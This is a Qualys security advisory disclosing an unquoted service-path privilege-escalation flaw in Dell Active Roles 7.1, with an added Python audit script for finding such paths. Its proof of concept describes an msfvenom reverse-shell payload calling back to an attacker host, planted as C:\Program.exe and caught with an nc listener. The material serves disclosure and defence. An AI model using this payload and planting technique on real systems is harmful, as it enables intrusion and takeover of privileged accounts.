Qualys Security Advisory QSA-2017-07-01 


Saturday, July 1, 2017


Dell Active Roles 7.x Unquoted Search Path Vulnerability 


SYNOPSIS: 


Dell Active Roles 7.1 uses a search path that contains an unquoted element, in which the element contains 
whitespace or other separators. This can cause the product to access resources in a parent path. 


Reference: https://www.oneidentity.com/products/active-roles


VULNERABILITY DETAILS: 


Lab Setup: 


1. Target: Dell ActiveRoles 7.1.2.3406 
2. Target IP Address: 10.113.14.112 


Vulnerable/Tested Version: 


Dell Active Roles 7.1.x running on Windows Server 2012. Older versions may also be affected. 


(Screenshot: Control Panel » Programs » Programs and Features on the target, listing "Dell Active Roles 7.1" (publisher Dell Software Inc., installed 6/15/2017, 231 MB, version 7.1.2.3406) alongside Microsoft ODBC Driver 11 for SQL Server 12.0.2000.8, Microsoft SQL Server 2008 Setup Support Files 10.3.5500.0 and Microsoft SQL Server 2012 Native Client 11.1.3000.0.)


Vulnerability: Unquoted Search Path Vulnerability 


The 'Active Roles Synchronization Service' uses a search path that contains an unquoted element, in which 
the element contains whitespace or other separators. This can cause the product to access resources in a 
parent path. 


(Screenshot: Services (Local) console and the properties dialog of the Active Roles Synchronization Service. Service name: ARSyncSvc; Display name: Active Roles Synchronization Service; Description (cut off in the dialog): "Active Roles component that performs data synchronization and replication tasks to enable user..."; Status: Running; Startup type: Automatic; Log On As: ACTIVEROLES\administrator; Path to executable, shown without quotes and cut off in the dialog: C:\Program Files\Dell\Active Roles\7.1\SyncService\SyncServic)


Risk Factor: High 


Impact: 


If a malicious individual has access to the file system, it is possible to elevate privileges by placing a file such as "C:\Program.exe" that is then run by a privileged program making use of WinExec.
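As an added illustration (not part of the Qualys advisory), the following Python enumerates the executables that CreateProcess/WinExec may probe for an unquoted service image path and flags the ones that would sit in a directory low-privileged users can write to; the service table and the writable-directory set are constructed samples, and on a live host they would come from the ImagePath values under the Services registry key and from an ACL check.

```python
from __future__ import annotations
import ntpath

def candidate_executables(image_path: str) -> list[str]:
    """Executables tried, in order, for a service command line.
    Unquoted with spaces: the prefix before each space, then the whole
    string, each with '.exe' appended when it lacks an extension.
    Quoted: exactly one candidate, so there is nothing to hijack."""
    image_path = image_path.strip()
    if image_path.startswith('"'):
        end = image_path.find('"', 1)
        return [image_path[1:end]] if end != -1 else [image_path[1:]]
    cuts = [i for i, ch in enumerate(image_path) if ch == " "]
    prefixes = [image_path[:i] for i in cuts] + [image_path]
    return [_default_exe(p) for p in prefixes if p]

def _default_exe(path: str) -> str:
    # CreateProcess appends .exe only when the last component has no extension.
    return path if "." in ntpath.basename(path) else path + ".exe"

def audit(services: dict[str, str],
          user_writable_dirs: set[str]) -> dict[str, list[str]]:
    """For each service whose ImagePath is unquoted and contains a space,
    return the candidates probed before the intended binary that sit in a
    directory low-privileged users can write to (the hijack condition)."""
    writable = {d.rstrip("\\").lower() for d in user_writable_dirs}
    findings: dict[str, list[str]] = {}
    for name, image_path in services.items():
        cands = candidate_executables(image_path)
        if len(cands) < 2:
            continue  # quoted or no whitespace: unambiguous
        exposed = [c for c in cands[:-1]
                   if ntpath.dirname(c).rstrip("\\").lower() in writable]
        if exposed:
            findings[name] = exposed
    return findings

# Constructed sample data (not the advisory's host); the writable-directory
# set is an assumption about this sample host, not a statement about defaults.
SAMPLE_SERVICES = {
    "VulnSyncSvc": r"C:\Program Files\Example Vendor\Sync Service\SyncSvc.exe",
    "QuotedSvc": r'"C:\Program Files\Example Vendor\Sync Service\SyncSvc.exe"',
    "ArgsSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
}
SAMPLE_WRITABLE = {"C:\\"}

if __name__ == "__main__":
    for svc, probes in audit(SAMPLE_SERVICES, SAMPLE_WRITABLE).items():
        print(f"{svc}: user-writable candidate(s) probed first: {probes}")
```

Quoting the path removes every candidate but the intended one, which is why the fix is to wrap the ImagePath in double quotes; arguments after a correctly named .exe (ArgsSvc) do not create a finding on their own.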


CVSS Score: AV:L/AC:L/Au:S/C:C/I:C/A:C


Proof-Of-Concept: 


1. Log into the target with a low-privileged account that has access to the file system.


(Screenshot: command prompt on the target as testuser. "net users testuser" shows an active account, Full Name "Test User", with no local group memberships and only "Domain Users" as a global group membership, followed by "The command completed successfully." "ipconfig" shows adapter Ethernet1 with media disconnected and adapter Ethernet0 with link-local IPv6 address fe80::b51d:26aa:277b:ad0d%12, IPv4 address 192.168.253.132, subnet mask 255.255.255.0 and default gateway 192.168.253.2.)


2. Create an executable file using MSFVenom.


(Screenshot: Kali terminal. Command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.100.6 LPORT=443 -f exe > Program.exe. Output: "No platform was selected, choosing Msf::Module::Platform::Windows from the payload", "No Arch selected, selecting Arch: x64 from the payload", "No encoder or badchars specified, outputting raw payload", "Payload size: 460 bytes", "Final size of exe file: 7168 bytes".)


3. Copy this file to the C: drive on the target machine.


(Screenshot: Explorer view of Local Disk (C:) on the target showing the folders inetpub, PerfLogs, Program Files, Program Files (x86), Users and Windows, plus the copied Program.exe (Application, 7 KB, modified 6/17/2017 2:26 AM).)


4. Wait for a system reboot or for an administrator to restart the Active Roles Synchronization Service.


5. The target machine sends a reverse shell after the reboot or when the service is restarted.


(Screenshot: netstat -anbo | find "443" run as Administrator on the target shows an ESTABLISHED connection on port 443.)


(Screenshot: Kali terminal. "nc -nvlp 443" prints "listening on [any] 443 ..." and then "connect to [192.168.100.6] from (UNKNOWN) [192.168.100.4] 60605", followed by a Windows shell banner "Microsoft Windows [Version 6.2.9200] (c) 2012 Microsoft Corporation. All rights reserved." In the shell, "whoami" returns activeroles\administrator, "hostname" returns WIN-QCVFKGJCS8A, and "ipconfig" shows adapter Ethernet1 with media disconnected and adapter Ethernet0 with link-local IPv6 address fe80::b51d:26aa:277b:ad0d%12, IPv4 address 192.168.253.132, subnet mask 255.255.255.0 and default gateway 192.168.253.2.)


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research@qualys.com


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


